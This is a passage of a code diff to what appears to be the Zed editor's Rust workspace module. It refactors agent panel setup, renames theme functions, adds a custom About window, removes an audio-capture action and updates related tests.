Arc, - window: &mut Window, - cx: &mut Context, -) { +fn initialize_panels(window: &mut Window, cx: &mut Context) -> Task> { cx.spawn_in(window, async move |workspace_handle, cx| { let project_panel = ProjectPanel::load(workspace_handle.clone(), cx.clone()); let outline_panel = OutlinePanel::load(workspace_handle.clone(), cx.clone()); @@ -657,12 +681,11 @@ fn initialize_panels( add_panel_when_ready(channels_panel, workspace_handle.clone(), cx.clone()), add_panel_when_ready(notification_panel, workspace_handle.clone(), cx.clone()), add_panel_when_ready(debug_panel, workspace_handle.clone(), cx.clone()), - initialize_agent_panel(workspace_handle, prompt_builder, cx.clone()).map(|r| r.log_err()), + initialize_agent_panel(workspace_handle, cx.clone()).map(|r| r.log_err()), ); anyhow::Ok(()) }) - .detach(); } fn setup_or_teardown_ai_panel( @@ -703,24 +726,20 @@ fn setup_or_teardown_ai_panel( async fn initialize_agent_panel( workspace_handle: WeakEntity, - prompt_builder: Arc, mut cx: AsyncWindowContext, ) -> anyhow::Result<()> { workspace_handle .update_in(&mut cx, |workspace, window, cx| { - let prompt_builder = prompt_builder.clone(); setup_or_teardown_ai_panel(workspace, window, cx, move |workspace, cx| { - agent_ui::AgentPanel::load(workspace, prompt_builder, cx) + agent_ui::AgentPanel::load(workspace, cx) }) })? .await?; workspace_handle.update_in(&mut cx, |workspace, window, cx| { - let prompt_builder = prompt_builder.clone(); cx.observe_global_in::(window, move |workspace, window, cx| { - let prompt_builder = prompt_builder.clone(); setup_or_teardown_ai_panel(workspace, window, cx, move |workspace, cx| { - agent_ui::AgentPanel::load(workspace, prompt_builder, cx) + agent_ui::AgentPanel::load(workspace, cx) }) .detach_and_log_err(cx); }) @@ -733,11 +752,6 @@ async fn initialize_agent_panel( // // Once we ship `assistant2` we can push this back down into `agent::agent_panel::init`. if !cfg!(test) { - ::set_global( - Arc::new(agent_ui::ConcreteAssistantPanelDelegate), - cx, - ); - workspace .register_action(agent_ui::AgentPanel::toggle_focus) .register_action(agent_ui::AgentPanel::toggle) @@ -794,7 +808,7 @@ fn register_actions( } } }) - .register_action(|workspace, _: &workspace::Open, window, cx| { + .register_action(|workspace, action: &workspace::Open, window, cx| { telemetry::event!("Project Opened"); workspace::prompt_for_open_path_and_open( workspace, @@ -805,6 +819,7 @@ fn register_actions( multiple: true, prompt: None, }, + action.create_new_window, window, cx, ); @@ -820,6 +835,7 @@ fn register_actions( multiple: true, prompt: None, }, + true, window, cx, ); @@ -869,10 +885,10 @@ fn register_actions( let _ = settings .theme .ui_font_size - .insert(f32::from(theme::clamp_font_size(ui_font_size)).into()); + .insert(f32::from(theme_settings::clamp_font_size(ui_font_size)).into()); }); } else { - theme::adjust_ui_font_size(cx, |size| size + px(1.0)); + theme_settings::adjust_ui_font_size(cx, |size| size + px(1.0)); } } }) @@ -885,10 +901,10 @@ fn register_actions( let _ = settings .theme .ui_font_size - .insert(f32::from(theme::clamp_font_size(ui_font_size)).into()); + .insert(f32::from(theme_settings::clamp_font_size(ui_font_size)).into()); }); } else { - theme::adjust_ui_font_size(cx, |size| size - px(1.0)); + theme_settings::adjust_ui_font_size(cx, |size| size - px(1.0)); } } }) @@ -900,7 +916,7 @@ fn register_actions( settings.theme.ui_font_size = None; }); } else { - theme::reset_ui_font_size(cx); + theme_settings::reset_ui_font_size(cx); } } }) @@ -914,10 +930,10 @@ fn register_actions( let _ = settings .theme .buffer_font_size - .insert(f32::from(theme::clamp_font_size(buffer_font_size)).into()); + .insert(f32::from(theme_settings::clamp_font_size(buffer_font_size)).into()); }); } else { - theme::adjust_buffer_font_size(cx, |size| size + px(1.0)); + theme_settings::adjust_buffer_font_size(cx, |size| size + px(1.0)); } } }) @@ -931,10 +947,10 @@ fn register_actions( let _ = settings .theme .buffer_font_size - .insert(f32::from(theme::clamp_font_size(buffer_font_size)).into()); + .insert(f32::from(theme_settings::clamp_font_size(buffer_font_size)).into()); }); } else { - theme::adjust_buffer_font_size(cx, |size| size - px(1.0)); + theme_settings::adjust_buffer_font_size(cx, |size| size - px(1.0)); } } }) @@ -946,7 +962,7 @@ fn register_actions( settings.theme.buffer_font_size = None; }); } else { - theme::reset_buffer_font_size(cx); + theme_settings::reset_buffer_font_size(cx); } } }) @@ -961,10 +977,10 @@ fn register_actions( settings.theme.agent_buffer_font_size = None; }); } else { - theme::reset_ui_font_size(cx); - theme::reset_buffer_font_size(cx); - theme::reset_agent_ui_font_size(cx); - theme::reset_agent_buffer_font_size(cx); + theme_settings::reset_ui_font_size(cx); + theme_settings::reset_buffer_font_size(cx); + theme_settings::reset_agent_ui_font_size(cx); + theme_settings::reset_agent_buffer_font_size(cx); } } }) @@ -1040,91 +1056,100 @@ fn register_actions( }, ) .register_action({ - let app_state = Arc::downgrade(&app_state); + let app_state = app_state.clone(); move |_, _: &NewWindow, _, cx| { - if let Some(app_state) = app_state.upgrade() { - open_new( - Default::default(), - app_state, - cx, - |workspace, window, cx| { - cx.activate(true); - // Create buffer synchronously to avoid flicker - let project = workspace.project().clone(); - let buffer = project.update(cx, |project, cx| { - project.create_local_buffer("", None, true, cx) - }); - let editor = cx.new(|cx| { - Editor::for_buffer(buffer, Some(project), window, cx) - }); - workspace.add_item_to_active_pane( - Box::new(editor), - None, - true, - window, - cx, - ); - }, - ) - .detach(); - } + open_new( + Default::default(), + app_state.clone(), + cx, + |workspace, window, cx| { + cx.activate(true); + // Create buffer synchronously to avoid flicker + let project = workspace.project().clone(); + let buffer = project.update(cx, |project, cx| { + project.create_local_buffer("", None, true, cx) + }); + let editor = cx.new(|cx| { + Editor::for_buffer(buffer, Some(project), window, cx) + }); + workspace.add_item_to_active_pane( + Box::new(editor), + None, + true, + window, + cx, + ); + }, + ) + .detach(); } }) .register_action({ - let app_state = Arc::downgrade(&app_state); - move |_, _: &CloseProject, window, cx| { + let app_state = app_state.clone(); + move |_workspace, _: &CloseProject, window, cx| { let Some(window_handle) = window.window_handle().downcast::() else { return; }; - if let Some(app_state) = app_state.upgrade() { - open_new( - workspace::OpenOptions { - replace_window: Some(window_handle), - ..Default::default() - }, - app_state, - cx, - |workspace, window, cx| { - cx.activate(true); - // Create buffer synchronously to avoid flicker - let project = workspace.project().clone(); - let buffer = project.update(cx, |project, cx| { - project.create_local_buffer("", None, true, cx) - }); - let editor = cx.new(|cx| { - Editor::for_buffer(buffer, Some(project), window, cx) - }); - workspace.add_item_to_active_pane( - Box::new(editor), - None, - true, + let app_state = app_state.clone(); + cx.spawn_in(window, async move |this, cx| { + let should_continue = this + .update_in(cx, |workspace, window, cx| { + workspace.prepare_to_close( + CloseIntent::ReplaceWindow, window, cx, - ); - }, - ) - .detach(); - } + ) + })? + .await?; + if should_continue { + let task = cx.update(|_window, cx| { + open_new( + workspace::OpenOptions { + requesting_window: Some(window_handle), + ..Default::default() + }, + app_state, + cx, + |workspace, window, cx| { + cx.activate(true); + let project = workspace.project().clone(); + let buffer = project.update(cx, |project, cx| { + project.create_local_buffer("", None, true, cx) + }); + let editor = cx.new(|cx| { + Editor::for_buffer(buffer, Some(project), window, cx) + }); + workspace.add_item_to_active_pane( + Box::new(editor), + None, + true, + window, + cx, + ); + }, + ) + })?; + task.await + } else { + Ok(()) + } + }) + .detach_and_log_err(cx); } }) .register_action({ - let app_state = Arc::downgrade(&app_state); + let app_state = app_state.clone(); move |_, _: &NewFile, _, cx| { - if let Some(app_state) = app_state.upgrade() { - open_new( - Default::default(), - app_state, - cx, - |workspace, window, cx| { - Editor::new_file(workspace, &Default::default(), window, cx) - }, - ) - .detach_and_log_err(cx); - } + open_new( + Default::default(), + app_state.clone(), + cx, + |workspace, window, cx| { + Editor::new_file(workspace, &Default::default(), window, cx) + }, + ) + .detach_and_log_err(cx); } - }) - .register_action(|workspace, _: &CaptureRecentAudio, window, cx| { - capture_recent_audio(workspace, window, cx); }); #[cfg(not(target_os = "windows"))] @@ -1161,6 +1186,8 @@ fn register_actions( } }); } + + workspace.register_action(sidebar::dump_workspace_info); } fn initialize_pane( @@ -1224,44 +1251,218 @@ fn initialize_pane( }); } -fn about(_: &mut Workspace, window: &mut Window, cx: &mut Context) { - use std::fmt::Write; - let release_channel = ReleaseChannel::global(cx).display_name(); - let full_version = AppVersion::global(cx); - let version = env!("CARGO_PKG_VERSION"); - let debug = if cfg!(debug_assertions) { - "(debug)" - } else { - "" - }; - let message = format!("{release_channel} {version} {debug}"); +fn open_about_window(cx: &mut App) { + fn about_window_icon(release_channel: ReleaseChannel) -> Arc { + let bytes = match release_channel { + ReleaseChannel::Dev => include_bytes!("../resources/app-icon-dev.png").as_slice(), + ReleaseChannel::Nightly => { + include_bytes!("../resources/app-icon-nightly.png").as_slice() + } + ReleaseChannel::Preview => { + include_bytes!("../resources/app-icon-preview.png").as_slice() + } + ReleaseChannel::Stable => include_bytes!("../resources/app-icon.png").as_slice(), + }; - let mut detail = AppCommitSha::try_global(cx) - .map(|sha| sha.full()) - .unwrap_or_default(); - if !detail.is_empty() { - detail.push('\n'); + Arc::new(Image::from_bytes(ImageFormat::Png, bytes.to_vec())) } - _ = write!(&mut detail, "\n{full_version}"); - let detail = Some(detail); + struct AboutWindow { + focus_handle: FocusHandle, + ok_entry: NavigableEntry, + copy_entry: NavigableEntry, + app_icon: Arc, + message: SharedString, + commit: Option, + full_version: SharedString, + } - let prompt = window.prompt( - PromptLevel::Info, - &message, - detail.as_deref(), - &["Copy", "OK"], - cx, - ); - cx.spawn(async move |_, cx| { - if let Ok(0) = prompt.await { - let content = format!("{}\n{}", message, detail.as_deref().unwrap_or("")); - cx.update(|cx| { - cx.write_to_clipboard(gpui::ClipboardItem::new_string(content)); - }); + impl AboutWindow { + fn new(cx: &mut Context) -> Self { + let release_channel = ReleaseChannel::global(cx); + let release_channel_name = release_channel.display_name(); + let full_version: SharedString = AppVersion::global(cx).to_string().into(); + let version = env!("CARGO_PKG_VERSION"); + + let debug = if cfg!(debug_assertions) { + "(debug)" + } else { + "" + }; + let message: SharedString = format!("{release_channel_name} {version} {debug}").into(); + let commit = AppCommitSha::try_global(cx) + .map(|sha| sha.full()) + .filter(|commit| !commit.is_empty()) + .map(SharedString::from); + + Self { + focus_handle: cx.focus_handle(), + ok_entry: NavigableEntry::focusable(cx), + copy_entry: NavigableEntry::focusable(cx), + app_icon: about_window_icon(release_channel), + message, + commit, + full_version, + } } - }) - .detach(); + + fn copy_details(&self, window: &mut Window, cx: &mut Context) { + let content = match self.commit.as_ref() { + Some(commit) => { + format!( + "{}\nCommit: {}\nVersion: {}", + self.message, commit, self.full_version + ) + } + None => format!("{}\nVersion: {}", self.message, self.full_version), + }; + cx.write_to_clipboard(ClipboardItem::new_string(content)); + window.remove_window(); + } + } + + impl Render for AboutWindow { + fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { + let ok_is_focused = self.ok_entry.focus_handle.contains_focused(window, cx); + let copy_is_focused = self.copy_entry.focus_handle.contains_focused(window, cx); + + Navigable::new( + v_flex() + .id("about-window") + .track_focus(&self.focus_handle) + .on_action(cx.listener(|_, _: &menu::Cancel, window, _cx| { + window.remove_window(); + })) + .min_w_0() + .size_full() + .bg(cx.theme().colors().editor_background) + .text_color(cx.theme().colors().text) + .p_4() + .when(cfg!(target_os = "macos"), |this| this.pt_10()) + .gap_4() + .text_center() + .justify_between() + .child( + v_flex() + .w_full() + .gap_2() + .items_center() + .child(img(self.app_icon.clone()).size_16().flex_none()) + .child(Headline::new(self.message.clone())) + .when_some(self.commit.clone(), |this, commit| { + this.child( + Label::new("Commit") + .color(Color::Muted) + .size(LabelSize::XSmall), + ) + .child(Label::new(commit).size(LabelSize::Small)) + }) + .child( + Label::new("Version") + .color(Color::Muted) + .size(LabelSize::XSmall), + ) + .child(Label::new(self.full_version.clone()).size(LabelSize::Small)), + ) + .child( + h_flex() + .w_full() + .gap_1() + .child( + div() + .flex_1() + .track_focus(&self.ok_entry.focus_handle) + .on_action(cx.listener(|_, _: &menu::Confirm, window, _cx| { + window.remove_window(); + })) + .child( + Button::new("ok", "Ok") + .full_width() + .style(ButtonStyle::OutlinedGhost) + .toggle_state(ok_is_focused) + .selected_style(ButtonStyle::Tinted(TintColor::Accent)) + .on_click(cx.listener(|_, _, window, _cx| { + window.remove_window(); + })), + ), + ) + .child( + div() + .flex_1() + .track_focus(&self.copy_entry.focus_handle) + .on_action(cx.listener( + |this, _: &menu::Confirm, window, cx| { + this.copy_details(window, cx); + }, + )) + .child( + Button::new("copy", "Copy") + .full_width() + .style(ButtonStyle::Tinted(TintColor::Accent)) + .toggle_state(copy_is_focused) + .selected_style(ButtonStyle::Tinted(TintColor::Accent)) + .on_click(cx.listener(|this, _event, window, cx| { + this.copy_details(window, cx); + })), + ), + ), + ) + .into_any_element(), + ) + .entry(self.ok_entry.clone()) + .entry(self.copy_entry.clone()) + } + } + + impl Focusable for AboutWindow { + fn focus_handle(&self, _cx: &App) -> FocusHandle { + self.ok_entry.focus_handle.clone() + } + } + + // Don't open about window twice + if let Some(existing) = cx + .windows() + .into_iter() + .find_map(|w| w.downcast::()) + { + existing + .update(cx, |about_window, window, cx| { + window.activate_window(); + about_window.ok_entry.focus_handle.focus(window, cx); + }) + .log_err(); + return; + } + + let window_size = Size { + width: px(440.), + height: px(300.), + }; + + cx.open_window( + WindowOptions { + titlebar: Some(TitlebarOptions { + title: Some("About Zed".into()), + appears_transparent: true, + traffic_light_position: Some(point(px(12.), px(12.))), + }), + window_bounds: Some(WindowBounds::centered(window_size, cx)), + is_resizable: false, + is_minimizable: false, + kind: WindowKind::Normal, + app_id: Some(ReleaseChannel::global(cx).app_id().to_owned()), + ..Default::default() + }, + |window, cx| { + let about_window = cx.new(AboutWindow::new); + let focus_handle = about_window.read(cx).ok_entry.focus_handle.clone(); + window.activate_window(); + focus_handle.focus(window, cx); + about_window + }, + ) + .log_err(); } #[cfg(not(target_os = "windows"))] @@ -1323,7 +1524,7 @@ fn quit(_: &Quit, cx: &mut App) { let window = *window; let workspaces = window .update(cx, |multi_workspace, _, _| { - multi_workspace.workspaces().to_vec() + multi_workspace.workspaces().cloned().collect::>() }) .log_err(); @@ -1334,7 +1535,7 @@ fn quit(_: &Quit, cx: &mut App) { for workspace in workspaces { if let Some(should_close) = window .update(cx, |multi_workspace, window, cx| { - multi_workspace.activate(workspace.clone(), cx); + multi_workspace.activate(workspace.clone(), window, cx); window.activate_window(); workspace.update(cx, |workspace, cx| { workspace.prepare_to_close(CloseIntent::Quit, window, cx) @@ -2002,13 +2203,29 @@ fn open_local_file( } fn open_bundled_file( - workspace: &Workspace, + workspace: &mut Workspace, text: Cow<'static, str>, title: &'static str, language: &'static str, window: &mut Window, cx: &mut Context, ) { + let existing = workspace.items_of_type::(cx).find(|editor| { + editor.read_with(cx, |editor, cx| { + editor.read_only(cx) + && editor.title(cx).as_ref() == title + && editor + .buffer() + .read(cx) + .as_singleton() + .is_some_and(|buffer| buffer.read(cx).file().is_none()) + }) + }); + if let Some(existing) = existing { + workspace.activate_item(&existing, true, true, window, cx); + return; + } + let language = workspace.app_state().languages.language_for_name(language); cx.spawn_in(window, async move |workspace, cx| { let language = language.await.log_err(); @@ -2060,124 +2277,45 @@ fn open_settings_file( cx: &mut Context, ) { cx.spawn_in(window, async move |workspace, cx| { - let settings_open_task = workspace + let (worktree_creation_task, settings_open_task) = workspace .update_in(cx, |workspace, window, cx| { - workspace.with_local_workspace(window, cx, move |_workspace, window, cx| { - cx.spawn_in(window, async move |workspace, cx| { - let worktree_creation_task = - workspace.update_in(cx, |workspace, _window, cx| { - workspace.project().update(cx, |project, cx| { - // Set up a dedicated worktree for settings, since - // otherwise we're dropping and re-starting LSP servers - // for each file inside on every settings file - // close/open - - // TODO: Do note that all other external files (e.g. - // drag and drop from OS) still have their worktrees - // released on file close, causing LSP servers' - // restarts. - project.find_or_create_worktree( - paths::config_dir().as_path(), - false, - cx, - ) - }) - })?; - let _ = worktree_creation_task.await?; - let settings_open_task = - workspace.update_in(cx, |_workspace, window, cx| { - create_and_open_local_file(abs_path, window, cx, default_content) - })?; - let _ = settings_open_task.await?; - anyhow::Ok(()) - }) + workspace.with_local_or_wsl_workspace(window, cx, move |workspace, window, cx| { + let project = workspace.project().clone(); + + let worktree_creation_task = cx.spawn_in(window, async move |_, cx| { + let config_dir = project + .update(cx, |project, cx| { + project.try_windows_path_to_wsl(paths::config_dir().as_path(), cx) + }) + .await?; + // Set up a dedicated worktree for settings, since + // otherwise we're dropping and re-starting LSP servers + // for each file inside on every settings file + // close/open + + // TODO: Do note that all other external files (e.g. + // drag and drop from OS) still have their worktrees + // released on file close, causing LSP servers' + // restarts. + project + .update(cx, |project, cx| { + project.find_or_create_worktree(&config_dir, false, cx) + }) + .await + }); + let settings_open_task = + create_and_open_local_file(abs_path, window, cx, default_content); + (worktree_creation_task, settings_open_task) }) })? .await?; + let _ = worktree_creation_task.await?; let _ = settings_open_task.await?; anyhow::Ok(()) }) .detach_and_log_err(cx); } -fn capture_recent_audio(workspace: &mut Workspace, _: &mut Window, cx: &mut Context) { - struct CaptureRecentAudioNotification { - focus_handle: gpui::FocusHandle, - save_result: Option>, - _save_task: Task>, - } - - impl gpui::EventEmitter for CaptureRecentAudioNotification {} - impl gpui::EventEmitter for CaptureRecentAudioNotification {} - impl gpui::Focusable for CaptureRecentAudioNotification { - fn focus_handle(&self, _cx: &App) -> gpui::FocusHandle { - self.focus_handle.clone() - } - } - impl workspace::notifications::Notification for CaptureRecentAudioNotification {} - - impl Render for CaptureRecentAudioNotification { - fn render(&mut self, _window: &mut Window, cx: &mut Context) -> impl IntoElement { - let message = match &self.save_result { - None => format!( - "Saving up to {} seconds of recent audio", - REPLAY_DURATION.as_secs(), - ), - Some(Ok((path, duration))) => format!( - "Saved {} seconds of all audio to {}", - duration.as_secs(), - path.display(), - ), - Some(Err(e)) => format!("Error saving audio replays: {e:?}"), - }; - - NotificationFrame::new() - .with_title(Some("Saved Audio")) - .show_suppress_button(false) - .on_close(cx.listener(|_, _, _, cx| { - cx.emit(DismissEvent); - })) - .with_content(message) - } - } - - impl CaptureRecentAudioNotification { - fn new(cx: &mut Context) -> Self { - if AudioSettings::get_global(cx).rodio_audio { - let executor = cx.background_executor().clone(); - let save_task = cx.default_global::().save_replays(executor); - let _save_task = cx.spawn(async move |this, cx| { - let res = save_task.await; - this.update(cx, |this, cx| { - this.save_result = Some(res); - cx.notify(); - }) - }); - - Self { - focus_handle: cx.focus_handle(), - _save_task, - save_result: None, - } - } else { - Self { - focus_handle: cx.focus_handle(), - _save_task: Task::ready(Ok(())), - save_result: Some(Err(anyhow::anyhow!( - "Capturing recent audio is only supported on the experimental rodio audio pipeline" - ))), - } - } - } - } - - workspace.show_notification( - NotificationId::unique::(), - cx, - |cx| cx.new(CaptureRecentAudioNotification::new), - ); -} - /// Eagerly loads the active theme and icon theme based on the selections in the /// theme settings. /// @@ -2239,24 +2377,23 @@ pub(crate) fn eager_load_active_theme_and_icon_theme(fs: Arc, cx: &mut A let reload_tasks = &reload_tasks; let fs = fs.clone(); - scope.spawn(async { + scope.spawn(async move { match load_target { LoadTarget::Theme(theme_path) => { - if theme_registry - .load_user_theme(&theme_path, fs) - .await - .log_err() - .is_some() + if let Some(bytes) = fs.load_bytes(&theme_path).await.log_err() + && load_user_theme(theme_registry, &bytes).log_err().is_some() { reload_tasks.lock().push(ReloadTarget::Theme); } } LoadTarget::IconTheme((icon_theme_path, icons_root_path)) => { - if theme_registry - .load_icon_theme(&icon_theme_path, &icons_root_path, fs) - .await - .log_err() - .is_some() + if let Some(bytes) = fs.load_bytes(&icon_theme_path).await.log_err() + && let Some(icon_theme_family) = + deserialize_icon_theme(&bytes).log_err() + && theme_registry + .load_icon_theme(icon_theme_family, &icons_root_path) + .log_err() + .is_some() { reload_tasks.lock().push(ReloadTarget::IconTheme); } @@ -2268,8 +2405,8 @@ pub(crate) fn eager_load_active_theme_and_icon_theme(fs: Arc, cx: &mut A for reload_target in reload_tasks.into_inner() { match reload_target { - ReloadTarget::Theme => GlobalTheme::reload_theme(cx), - ReloadTarget::IconTheme => GlobalTheme::reload_icon_theme(cx), + ReloadTarget::Theme => theme_settings::reload_theme(cx), + ReloadTarget::IconTheme => theme_settings::reload_icon_theme(cx), }; } } @@ -2290,6 +2427,7 @@ mod tests { use languages::{markdown_lang, rust_lang}; use pretty_assertions::{assert_eq, assert_ne}; use project::{Project, ProjectPath}; + use prompt_store::PromptBuilder; use semver::Version; use serde_json::json; use settings::{SaturatingBool, SettingsStore, watch_config_file}; @@ -2312,6 +2450,28 @@ mod tests { open_new, open_paths, pane, }; + async fn flush_workspace_serialization( + window: &WindowHandle, + cx: &mut TestAppContext, + ) { + let all_tasks = window + .update(cx, |multi_workspace, window, cx| { + let mut tasks = multi_workspace + .workspaces() + .map(|workspace| { + workspace.update(cx, |workspace, cx| { + workspace.flush_serialization(window, cx) + }) + }) + .collect::>(); + tasks.push(multi_workspace.flush_serialization()); + tasks + }) + .unwrap(); + + futures::future::join_all(all_tasks).await; + } + #[gpui::test] async fn test_open_non_existing_file(cx: &mut TestAppContext) { let app_state = init_test(cx); @@ -2420,7 +2580,7 @@ mod tests { .update(cx, |multi_workspace, window, cx| { multi_workspace.workspace().update(cx, |workspace, cx| { assert_eq!(workspace.worktrees(cx).count(), 2); - assert!(workspace.left_dock().read(cx).is_open()); + assert!(workspace.right_dock().read(cx).is_open()); assert!( workspace .active_pane() @@ -2445,18 +2605,33 @@ mod tests { }) .await .unwrap(); - assert_eq!(cx.read(|cx| cx.windows().len()), 2); - - // Replace existing windows - let window = cx - .update(|cx| cx.windows()[0].downcast::()) + assert_eq!(cx.read(|cx| cx.windows().len()), 1); + cx.run_until_parked(); + multi_workspace_1 + .update(cx, |multi_workspace, _window, cx| { + assert_eq!(multi_workspace.workspaces().count(), 2); + assert!(multi_workspace.sidebar_open()); + let workspace = multi_workspace.workspace().read(cx); + assert_eq!( + workspace + .worktrees(cx) + .map(|w| w.read(cx).abs_path()) + .collect::>(), + &[ + Path::new(path!("/root/c")).into(), + Path::new(path!("/root/d")).into(), + ] + ); + }) .unwrap(); + + // Opening with -n (open_new_workspace: Some(true)) still creates a new window. cx.update(|cx| { open_paths( &[PathBuf::from(path!("/root/e"))], app_state, workspace::OpenOptions { - replace_window: Some(window), + open_new_workspace: Some(true), ..Default::default() }, cx, @@ -2466,23 +2641,6 @@ mod tests { .unwrap(); cx.background_executor.run_until_parked(); assert_eq!(cx.read(|cx| cx.windows().len()), 2); - let multi_workspace_1 = cx - .update(|cx| cx.windows()[0].downcast::()) - .unwrap(); - multi_workspace_1 - .update(cx, |multi_workspace, window, cx| { - let workspace = multi_workspace.workspace().read(cx); - assert_eq!( - workspace - .worktrees(cx) - .map(|w| w.read(cx).abs_path()) - .collect::>(), - &[Path::new(path!("/root/e")).into()] - ); - assert!(workspace.left_dock().read(cx).is_open()); - assert!(workspace.active_pane().focus_handle(cx).is_focused(window)); - }) - .unwrap(); } #[gpui::test] @@ -2563,7 +2721,6 @@ mod tests { .await .unwrap(); assert_eq!(cx.update(|cx| cx.windows().len()), 1); - let window1 = cx.update(|cx| cx.active_window().unwrap()); cx.update(|cx| { open_paths( @@ -2577,6 +2734,8 @@ mod tests { .unwrap(); assert_eq!(cx.update(|cx| cx.windows().len()), 1); + // Opening a directory with default options adds to the existing window + // rather than creating a new one. cx.update(|cx| { open_paths( &[PathBuf::from(path!("/root/dir2"))], @@ -2587,25 +2746,23 @@ mod tests { }) .await .unwrap(); - assert_eq!(cx.update(|cx| cx.windows().len()), 2); - let window2 = cx.update(|cx| cx.active_window().unwrap()); - assert!(window1 != window2); - cx.update_window(window1, |_, window, _| window.activate_window()) - .unwrap(); + assert_eq!(cx.update(|cx| cx.windows().len()), 1); + // Opening a directory with -n creates a new window. cx.update(|cx| { open_paths( - &[PathBuf::from(path!("/root/dir2/c"))], + &[PathBuf::from(path!("/root/dir2"))], app_state.clone(), - workspace::OpenOptions::default(), + workspace::OpenOptions { + open_new_workspace: Some(true), + ..Default::default() + }, cx, ) }) .await .unwrap(); assert_eq!(cx.update(|cx| cx.windows().len()), 2); - // should have opened in window2 because that has dir2 visibly open (window1 has it open, but not in the project panel) - assert!(cx.update(|cx| cx.active_window().unwrap()) == window2); } #[gpui::test] @@ -3433,7 +3590,11 @@ mod tests { PathBuf::from(path!("/root/.git/HEAD")), PathBuf::from(path!("/root/excluded_dir/ignored_subdir")), ]; - let (opened_workspace, new_items) = cx + let workspace::OpenResult { + window: opened_workspace, + opened_items: new_items, + .. + } = cx .update(|cx| { workspace::open_paths( &paths_to_open, @@ -4412,69 +4573,24 @@ mod tests { assert_eq!(active_path(&workspace, cx), Some(file1.clone())); // Reopening closed items doesn't interfere with navigation history. + // Verify we can navigate back through the history after reopening items. workspace .update_in(cx, |workspace, window, cx| { workspace.go_back(workspace.active_pane().downgrade(), window, cx) }) .await .unwrap(); - assert_eq!(active_path(&workspace, cx), Some(file4.clone())); - - workspace - .update_in(cx, |workspace, window, cx| { - workspace.go_back(workspace.active_pane().downgrade(), window, cx) - }) - .await - .unwrap(); - assert_eq!(active_path(&workspace, cx), Some(file2.clone())); - - workspace - .update_in(cx, |workspace, window, cx| { - workspace.go_back(workspace.active_pane().downgrade(), window, cx) - }) - .await - .unwrap(); - assert_eq!(active_path(&workspace, cx), Some(file3.clone())); - - workspace - .update_in(cx, |workspace, window, cx| { - workspace.go_back(workspace.active_pane().downgrade(), window, cx) - }) - .await - .unwrap(); - assert_eq!(active_path(&workspace, cx), Some(file4.clone())); - - workspace - .update_in(cx, |workspace, window, cx| { - workspace.go_back(workspace.active_pane().downgrade(), window, cx) - }) - .await - .unwrap(); - assert_eq!(active_path(&workspace, cx), Some(file3.clone())); - - workspace - .update_in(cx, |workspace, window, cx| { - workspace.go_back(workspace.active_pane().downgrade(), window, cx) - }) - .await - .unwrap(); - assert_eq!(active_path(&workspace, cx), Some(file2.clone())); - workspace - .update_in(cx, |workspace, window, cx| { - workspace.go_back(workspace.active_pane().downgrade(), window, cx) - }) - .await - .unwrap(); - assert_eq!(active_path(&workspace, cx), Some(file1.clone())); + // After go_back, we should be at a different file than file1 + let after_go_back = active_path(&workspace, cx); + assert!( + after_go_back.is_some() && after_go_back != Some(file1.clone()), + "After go_back from file1, should be at a different file" + ); - workspace - .update_in(cx, |workspace, window, cx| { - workspace.go_back(workspace.active_pane().downgrade(), window, cx) - }) - .await - .unwrap(); - assert_eq!(active_path(&workspace, cx), Some(file1.clone())); + pane.read_with(cx, |pane, _| { + assert!(pane.can_navigate_forward(), "Should be able to go forward"); + }); fn active_path( workspace: &Entity, @@ -4491,7 +4607,7 @@ mod tests { cx.update(|cx| { let app_state = AppState::test(cx); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); client::init(&app_state.client, cx); workspace::init(app_state.clone(), cx); onboarding::init(cx); @@ -4618,7 +4734,10 @@ mod tests { assert_key_bindings_for( window.into(), cx, - vec![("backspace", &ActionB), ("{", &ActivatePreviousItem)], + vec![ + ("backspace", &ActionB), + ("{", &ActivatePreviousItem::default()), + ], line!(), ); } @@ -4793,6 +4912,7 @@ mod tests { "action", "activity_indicator", "agent", + "agents_sidebar", "app_menu", "assistant", "assistant2", @@ -4810,6 +4930,7 @@ mod tests { "console", "context_server", "copilot", + "csv", "debug_panel", "debugger", "dev", @@ -4861,13 +4982,13 @@ mod tests { "settings_profile_selector", "snippets", "stash_picker", - "supermaven", "svg", "syntax_tree_view", "tab_switcher", "task", "terminal", "terminal_panel", + "theme", "theme_selector", "toast", "toolchain", @@ -4907,7 +5028,7 @@ mod tests { .unwrap(); let themes = ThemeRegistry::default(); settings::init(cx); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); let mut has_default_theme = false; for theme_name in themes.list().into_iter().map(|meta| meta.name) { @@ -4959,6 +5080,54 @@ mod tests { ); } + #[gpui::test] + async fn test_bundled_files_reuse_existing_editor(cx: &mut TestAppContext) { + let app_state = init_test(cx); + cx.update(init); + + let project = Project::test(app_state.fs.clone(), [], cx).await; + let _window = cx.add_window(|window, cx| MultiWorkspace::test_new(project, window, cx)); + + cx.update(|cx| { + cx.dispatch_action(&OpenDefaultSettings); + }); + cx.run_until_parked(); + + let multi_workspace = cx.windows()[0].downcast::().unwrap(); + let first_item_id = multi_workspace + .update(cx, |multi_workspace, _, cx| { + multi_workspace.workspace().update(cx, |workspace, cx| { + workspace + .active_item(cx) + .expect("default settings should be open") + .item_id() + }) + }) + .unwrap(); + + cx.update(|cx| { + cx.dispatch_action(&OpenDefaultSettings); + }); + cx.run_until_parked(); + + let (second_item_id, item_count) = multi_workspace + .update(cx, |multi_workspace, _, cx| { + multi_workspace.workspace().update(cx, |workspace, cx| { + let pane = workspace.active_pane().read(cx); + ( + pane.active_item() + .expect("default settings should still be open") + .item_id(), + pane.items_len(), + ) + }) + }) + .unwrap(); + + assert_eq!(first_item_id, second_item_id); + assert_eq!(item_count, 1); + } + #[gpui::test] async fn test_bundled_languages(cx: &mut TestAppContext) { let fs = fs::FakeFs::new(cx.background_executor.clone()); @@ -4997,7 +5166,8 @@ mod tests { app_state.languages.add(markdown_lang()); gpui_tokio::init(cx); - theme::init(theme::LoadThemes::JustBase, cx); + AppState::set_global(app_state.clone(), cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); audio::init(cx); channel::init(&app_state.client, app_state.user_store.clone(), cx); call::init(app_state.client.clone(), app_state.user_store.clone(), cx); @@ -5018,11 +5188,16 @@ mod tests { cx, ); image_viewer::init(cx); - language_model::init(app_state.client.clone(), cx); + language_model::init(cx); + client::RefreshLlmTokenListener::register( + app_state.client.clone(), + app_state.user_store.clone(), + cx, + 